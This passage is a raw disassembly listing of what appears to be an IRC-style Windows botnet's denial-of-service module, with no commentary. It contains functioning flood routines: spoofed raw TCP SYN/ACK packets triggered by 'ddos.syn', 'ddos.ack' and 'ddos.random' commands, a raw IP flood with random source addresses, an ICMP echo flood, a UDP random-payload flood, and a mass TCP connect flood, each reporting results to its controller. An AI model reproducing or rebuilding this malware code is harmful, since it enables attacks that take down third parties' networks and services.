mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_4CB944 ; WSAStartup
test eax, eax
jz short loc_4136D4
xor eax, eax
jmp loc_4139C7
; ---------------------------------------------------------------------------
loc_4136D4: ; CODE XREF: sub_413694+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_4CBA78 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_20], eax
jz loc_4139BF
push esi
lea ecx, [ebp+var_40]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_40], edi
call dword_4CB9B4 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_4139B5
push [ebp+arg_C]
mov [ebp+var_58], 2
call dword_4CB9D4 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_56], ax
mov [ebp+var_54], esi
mov [ebp+var_34], 45h
call dword_4CB9D4 ; htons
push [ebp+arg_C]
mov [ebp+var_32], ax
mov [ebp+var_30], di
mov [ebp+var_2E], bx
mov [ebp+var_2C], 80h
mov [ebp+var_2B], 6
mov [ebp+var_2A], bx
mov [ebp+var_24], esi
call dword_4CB9D4 ; htons
mov [ebp+var_12], ax
call _rand
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_4CB9D4 ; htons
push 12345678h
mov [ebp+var_14], ax
call dword_4CB9D0 ; htonl
push offset aDdos_syn ; "ddos.syn"
mov [ebp+var_10], eax
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4137A4
mov [ebp+var_C], ebx
mov [ebp+var_7], 2
jmp short loc_4137F8
; ---------------------------------------------------------------------------
loc_4137A4: ; CODE XREF: sub_413694+105�j
push offset aDdos_ack ; "ddos.ack"
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4137C0
mov [ebp+var_C], ebx
mov [ebp+var_7], 10h
jmp short loc_4137F8
; ---------------------------------------------------------------------------
loc_4137C0: ; CODE XREF: sub_413694+121�j
push offset aDdos_random ; "ddos.random"
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4137F8
call _rand
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_C], edx
call _rand
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_7], dl
loc_4137F8: ; CODE XREF: sub_413694+10E�j
; sub_413694+12A�j ...
push 4000h
mov [ebp+var_8], 50h
call dword_4CB9D4 ; htons
mov [ebp+var_6], ax
lea eax, [ebp+var_48]
push eax
mov [ebp+var_2], bx
mov [ebp+Str1], ebx
call ds:dword_42713C ; QueryPerformanceFrequency
lea eax, [ebp+var_1C]
push eax
call ds:dword_427138 ; QueryPerformanceCounter
push [ebp+var_44]
mov eax, [ebp+arg_10]
cdq
push [ebp+var_48]
push edx
push eax
call __allmul
add eax, [ebp+var_1C]
push 14h
pop esi
adc edx, [ebp+var_18]
mov [ebp+var_3C], eax
mov [ebp+var_38], edx
loc_413846: ; CODE XREF: sub_413694+2E2�j
; sub_413694+2F0�j
mov [ebp+var_4], bx
call _rand
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_4CB9D4 ; htons
mov [ebp+var_14], ax
call _rand
mov edi, eax
shl edi, 10h
call _rand
or edi, eax
push edi
call dword_4CB9D4 ; htons
movzx eax, ax
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_4CB9D0 ; htonl
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push esi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_4CB9D4 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_28]
mov [ebp+Src], eax
lea eax, [ebp+Src]
push 20h ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_14]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_94]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40AA5F
mov [ebp+var_4], ax
lea eax, [ebp+var_34]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_14]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40AA5F
mov [ebp+var_2A], ax
lea eax, [ebp+var_34]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
add esp, 14h
lea eax, [ebp+var_58]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_20]
call dword_4CBA38 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_413989
add [ebp+Str1], eax
lea eax, [ebp+var_1C]
push eax
call ds:dword_427138 ; QueryPerformanceCounter
mov eax, [ebp+var_18]
cmp eax, [ebp+var_38]
jg short loc_4139B2
jl loc_413846
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_3C]
jnb short loc_4139B2
jmp loc_413846
; ---------------------------------------------------------------------------
loc_413989: ; CODE XREF: sub_413694+2CB�j
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_4378C4 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax
call sub_415D38
add esp, 10h
jmp short loc_4139B5
; ---------------------------------------------------------------------------
loc_4139B2: ; CODE XREF: sub_413694+2E0�j
; sub_413694+2EE�j
mov ebx, [ebp+Str1]
loc_4139B5: ; CODE XREF: sub_413694+78�j
; sub_413694+31C�j
push [ebp+var_20]
call dword_4CBA6C ; closesocket
pop esi
loc_4139BF: ; CODE XREF: sub_413694+5B�j
call dword_4CB92C ; WSACleanup
mov eax, ebx
loc_4139C7: ; CODE XREF: sub_413694+3B�j
pop edi
pop ebx
leave
retn
sub_413694 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4139CB(int,char *Str,char *Str1,int)
sub_4139CB proc near ; CODE XREF: sub_4135DF+4F�p
arg_0 = dword ptr 4
Str = dword ptr 8
Str1 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40A8F0
push [esp+10h+Str] ; Str
mov esi, eax
call _atoi
push [esp+14h+arg_C] ; Str
mov ebx, eax
call _atoi
mov edi, eax
call _rand
cdq
mov ecx, 200h
push edi ; int
idiv ecx
push ebx ; int
push [esp+20h+Str1] ; Str1
lea eax, [edx+esi+100h]
push eax ; int
push esi ; int
call sub_413694
add esp, 20h
test eax, eax
jnz short loc_413A1A
push 1
pop eax
loc_413A1A: ; CODE XREF: sub_4139CB+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4139CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413A29 proc near ; DATA XREF: sub_401ACD+6643�o
Dest = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
Str = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
Dst = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
push ebx
push esi
mov eax, [ebp+arg_0]
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_1BC]
push 1
pop ebx
push 0FFh
push 3
rep movsd
push 2
mov [eax+19Ch], ebx
call dword_4CBA54 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_413AC4
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_4379C4 ; "-"
push eax ; Dest
call _sprintf
xor edi, edi
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_413AA7
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_409869
add esp, 14h
loc_413AA7: ; CODE XREF: sub_413A29+5C�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_38]
call sub_40B6D6
pop ecx
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
loc_413AC4: ; CODE XREF: sub_413A29+3A�j
lea ecx, [ebp+var_C]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_C], ebx
call dword_4CB9B4 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_413B3B
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_437994 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_413B1E
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_409869
add esp, 14h
loc_413B1E: ; CODE XREF: sub_413A29+D3�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_38]
call sub_40B6D6
pop ecx
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
loc_413B3B: ; CODE XREF: sub_413A29+B3�j
lea eax, [ebp+var_1B8]
push eax
call dword_4CBA14 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_413BA2
lea eax, [ebp+Dest]
push offset asc_437974 ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+var_24], edi
pop ecx
pop ecx
jnz short loc_413B85
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_409869
add esp, 14h
loc_413B85: ; CODE XREF: sub_413A29+13A�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_38]
call sub_40B6D6
pop ecx
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
loc_413BA2: ; CODE XREF: sub_413A29+122�j
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push edi
call dword_4CB9D4 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call dword_4CBA14 ; inet_addr
mov esi, ds:dword_4270B0
mov [ebp+var_18], eax
mov [ebp+arg_0], edi
call esi ; GetTickCount
mov [ebp+var_8], eax
loc_413BE0: ; CODE XREF: sub_413A29+2E8�j
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_413D8B
push 41Ch
mov byte_4CE740, 45h
call dword_4CB9D4 ; htons
cmp [ebp+var_2C], edi
mov word_4CE742, ax
mov word_4CE744, bx
mov word_4CE746, di
mov byte_4CE748, 80h
mov byte_4CE749, bl
mov word_4CE74A, di
jz short loc_413C66
call _rand
mov ebx, eax
shl ebx, 8
call _rand
add ebx, eax
shl ebx, 8
call _rand
add ebx, eax
shl ebx, 8
call _rand
add ebx, eax
push 1
mov dword_4CE74C, ebx
pop ebx
jmp short loc_413C7E
; ---------------------------------------------------------------------------
loc_413C66: ; CODE XREF: sub_413A29+20B�j
push [ebp+var_1BC]
call sub_40AA06
pop ecx
push eax
call dword_4CBA14 ; inet_addr
mov dword_4CE74C, eax
loc_413C7E: ; CODE XREF: sub_413A29+23B�j
mov eax, [ebp+var_18]
mov dword_4CE750, eax
call _rand
cdq
mov ecx, 100h
idiv ecx
mov byte_4CE754, dl
call _rand
cdq
mov ecx, 100h
idiv ecx
mov byte_4CE755, dl
call _rand
cdq
mov ecx, 0F0h
push 400h ; Size
idiv ecx
mov word_4CE756, di
mov word_4CE75A, bx
inc edx
mov word_4CE758, dx
call _rand
cdq
mov ecx, 0FFh
idiv ecx
push edx ; Val
push offset dword_4CE75C ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push 10h
push eax
push edi
push 41Ch
push offset byte_4CE740
push [ebp+var_4]
call dword_4CBA38 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_413D16
inc [ebp+arg_0]
jmp loc_413BE0
; ---------------------------------------------------------------------------
loc_413D16: ; CODE XREF: sub_413A29+2E3�j
push [ebp+var_4]
call dword_4CBA6C ; closesocket
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
push offset asc_43792C ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_413D6E
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_409869
add esp, 14h
loc_413D6E: ; CODE XREF: sub_413A29+323�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_38]
call sub_40B6D6
pop ecx
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
loc_413D8B: ; CODE XREF: sub_413A29+1C8�j
push [ebp+var_4]
call dword_4CBA6C ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+Dest]
push offset asc_4378E0 ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_24], edi
jnz short loc_413DF3
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_409869
add esp, 14h
loc_413DF3: ; CODE XREF: sub_413A29+3A8�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_38]
call sub_40B6D6
pop ecx
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
sub_413A29 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413E10 proc near ; DATA XREF: sub_401ACD+542D�o
var_10320 = byte ptr -10320h
Dest = byte ptr -344h
var_144 = dword ptr -144h
Str = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
Dst = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
push 1
pop edi
mov [eax+120h], edi
call dword_4CB95C ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call dword_4CBA14 ; inet_addr
mov esi, eax
xor ebx, ebx
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_413E6B
lea eax, [ebp+var_C0]
push eax
call dword_4CBA58 ; gethostbyname
cmp eax, ebx
jz short loc_413E71
loc_413E6B: ; CODE XREF: sub_413E10+48�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_413ECE
loc_413E71: ; CODE XREF: sub_413E10+59�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+Dest]
push offset asc_437A1C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_413EB1
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_144] ; int
call sub_409869
add esp, 14h
loc_413EB1: ; CODE XREF: sub_413E10+7F�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_30]
call sub_40B6D6
pop ecx
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
loc_413ECE: ; CODE XREF: sub_413E10+5F�j
cmp eax, ebx
jz short loc_413EDE
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_413EE1
; ---------------------------------------------------------------------------
loc_413EDE: ; CODE XREF: sub_413E10+C0�j
mov [ebp+var_4], esi
loc_413EE1: ; CODE XREF: sub_413E10+CC�j
push 1Ch ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
add esp, 0Ch
cmp [ebp+var_3C], eax
jle short loc_413F01
mov [ebp+var_3C], eax
loc_413F01: ; CODE XREF: sub_413E10+EC�j
cmp [ebp+var_38], edi
jge short loc_413F09
mov [ebp+var_38], edi
loc_413F09: ; CODE XREF: sub_413E10+F4�j
xor esi, esi
cmp [ebp+var_40], ebx
jle short loc_413F36
loc_413F10: ; CODE XREF: sub_413E10+124�j
push [ebp+var_38]
lea eax, [ebp+Dst]
push 1Ch
push eax
push ebx
lea eax, [ebp+var_10320]
push [ebp+var_3C]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call dword_4CB8EC ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_413F10
loc_413F36: ; CODE XREF: sub_413E10+FE�j
push [ebp+arg_0]
call dword_4CBA8C ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+Dest]
push offset asc_4379F0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_413F7F
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_144] ; int
call sub_409869
add esp, 14h
loc_413F7F: ; CODE XREF: sub_413E10+14D�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_30]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
sub_413E10 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413F9C proc near ; DATA XREF: sub_401ACD+5679�o
var_10311 = byte ptr -10311h
var_10310 = byte ptr -10310h
Dest = byte ptr -334h
var_134 = dword ptr -134h
Str = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10310h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
push 1
pop esi
mov [eax+120h], esi
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
push 11h
push 2
push 2
call dword_4CBA54 ; socket
mov ebx, eax
xor edi, edi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_B0]
mov [ebp+Dst], 2
push eax
call dword_4CBA14 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_414081
lea eax, [ebp+var_B0]
push eax
call dword_4CBA58 ; gethostbyname
cmp eax, edi
jnz short loc_41407A
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+Dest]
push offset asc_437A70 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_41405D
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_1C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_134] ; int
call sub_409869
add esp, 14h
loc_41405D: ; CODE XREF: sub_413F9C+9F�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_20]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_41407A: ; CODE XREF: sub_413F9C+7F�j
mov eax, [eax+0Ch]
mov eax, [eax]
jmp short loc_414084
; ---------------------------------------------------------------------------
loc_414081: ; CODE XREF: sub_413F9C+6E�j
lea eax, [ebp+arg_0]
loc_414084: ; CODE XREF: sub_413F9C+E3�j
mov eax, [eax]
cmp [ebp+var_24], edi
mov [ebp+var_C], eax
jnz short loc_41409F
call _rand
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_4140A2
; ---------------------------------------------------------------------------
loc_41409F: ; CODE XREF: sub_413F9C+F0�j
push [ebp+var_24]
loc_4140A2: ; CODE XREF: sub_413F9C+101�j
call dword_4CB9D4 ; htons
cmp [ebp+var_24], esi
mov [ebp+var_E], ax
jge short loc_4140B4
mov [ebp+var_24], esi
loc_4140B4: ; CODE XREF: sub_413F9C+113�j
mov eax, 0FFFFh
cmp [ebp+var_24], eax
jle short loc_4140C1
mov [ebp+var_24], eax
loc_4140C1: ; CODE XREF: sub_413F9C+120�j
mov eax, [ebp+var_30]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_28], edi
mov [ebp+var_30], eax
jnz short loc_4140D5
mov [ebp+var_28], esi
loc_4140D5: ; CODE XREF: sub_413F9C+134�j
xor esi, esi
cmp [ebp+var_2C], edi
jle short loc_4140F6
loc_4140DC: ; CODE XREF: sub_413F9C+158�j
call _rand
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_2C]
mov [ebp+esi+var_10311], dl
jl short loc_4140DC
loc_4140F6: ; CODE XREF: sub_413F9C+13E�j
; sub_413F9C+19C�j ...
mov eax, [ebp+var_30]
dec [ebp+var_30]
test eax, eax
jle short loc_414155
push 0Bh
pop esi
loc_414103: ; CODE XREF: sub_413F9C+197�j
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_2C]
sub eax, edx
push eax
lea eax, [ebp+var_10310]
push eax
push ebx
call dword_4CBA38 ; sendto
push [ebp+var_28]
call ds:dword_427080 ; Sleep
dec esi
jnz short loc_414103
cmp [ebp+var_24], edi
jnz short loc_4140F6
call _rand
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call dword_4CB9D4 ; htons
mov [ebp+var_E], ax
jmp short loc_4140F6
; ---------------------------------------------------------------------------
loc_414155: ; CODE XREF: sub_413F9C+162�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+Dest]
push offset asc_437A44 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_414195
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_1C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_134] ; int
call sub_409869
add esp, 14h
loc_414195: ; CODE XREF: sub_413F9C+1D7�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_20]
call sub_40B6D6
pop ecx
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
sub_413F9C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4141B2 proc near ; DATA XREF: sub_401ACD+4CC4�o
Dest = byte ptr -414h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_190 = byte ptr -190h
var_110 = dword ptr -110h
Str = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax ; int
lea eax, [ebp+var_190]
push eax ; Str
lea eax, [ebp+var_210]
push eax ; int
call sub_414313
add esp, 0Ch
push eax
lea eax, [ebp+Dest]
push offset asc_437A98 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_414232
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_214] ; int
call sub_409869
add esp, 14h
loc_414232: ; CODE XREF: sub_4141B2+5E�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_10]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_4141B2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414251 proc near ; CODE XREF: sub_414313+27�p
var_654 = byte ptr -654h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 654h
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_4]
call dword_4CB9D4 ; htons
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
test eax, eax
mov [ebp+var_4], 1
jle short loc_41430F
push ebx
push esi
push edi
mov [ebp+arg_4], eax
mov edi, 190h
loc_41429C: ; CODE XREF: sub_414251+B9�j
lea esi, [ebp+var_654]
mov ebx, edi
loc_4142A4: ; CODE XREF: sub_414251+7A�j
push 0
push 1
push 2
call ds:dword_427204 ; socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_4142C7
lea ecx, [ebp+var_4]
push ecx
push 8004667Eh
push eax
call ds:dword_4271E0 ; ioctlsocket
loc_4142C7: ; CODE XREF: sub_414251+64�j
add esi, 4
dec ebx
jnz short loc_4142A4
lea esi, [ebp+var_654]
mov ebx, edi
loc_4142D5: ; CODE XREF: sub_414251+96�j
lea eax, [ebp+Dst]
push 10h
push eax
push dword ptr [esi]
call ds:dword_4271F8 ; connect
add esi, 4
dec ebx
jnz short loc_4142D5
push 64h
call ds:dword_427080 ; Sleep
lea esi, [ebp+var_654]
mov ebx, edi
loc_4142F9: ; CODE XREF: sub_414251+B4�j
push dword ptr [esi]
call ds:dword_427200 ; closesocket
add esi, 4
dec ebx
jnz short loc_4142F9
dec [ebp+arg_4]
jnz short loc_41429C
pop edi
pop esi
pop ebx
loc_41430F: ; CODE XREF: sub_414251+3E�j
xor eax, eax
leave
retn
sub_414251 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_414313(int,char *Str,int)
sub_414313 proc near ; CODE XREF: sub_4141B2+3C�p
arg_0 = dword ptr 4
Str = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40A8F0
push [esp+10h+Str] ; Str
mov edi, eax
call _atoi
push [esp+14h+arg_8] ; Str
mov ebx, eax
call _atoi
mov esi, eax
push esi
push ebx
push edi
call sub_414251
add esp, 18h
test eax, eax
jnz short loc_414349
push 1
pop eax
loc_414349: ; CODE XREF: sub_414313+31�j
cdq
mov ecx, 3E8h
pop edi
idiv ecx
cdq
idiv esi
pop esi
pop ebx
retn
sub_414313 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414358 proc near ; DATA XREF: sub_401ACD+636B�o
Dest = byte ptr -414h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_190 = byte ptr -190h
var_110 = dword ptr -110h
Str = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax ; int
lea eax, [ebp+var_190]
push eax ; Str
lea eax, [ebp+var_210]
push eax ; int
call sub_4146A9
add esp, 0Ch
push eax
lea eax, [ebp+Dest]
push offset asc_437AC4 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_4143D8
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_214] ; int
call sub_409869
add esp, 14h
loc_4143D8: ; CODE XREF: sub_414358+5E�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_10]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_414358 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4143F7 proc near ; CODE XREF: sub_4146A9+3C�p
var_284 = byte ptr -284h
Dest = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
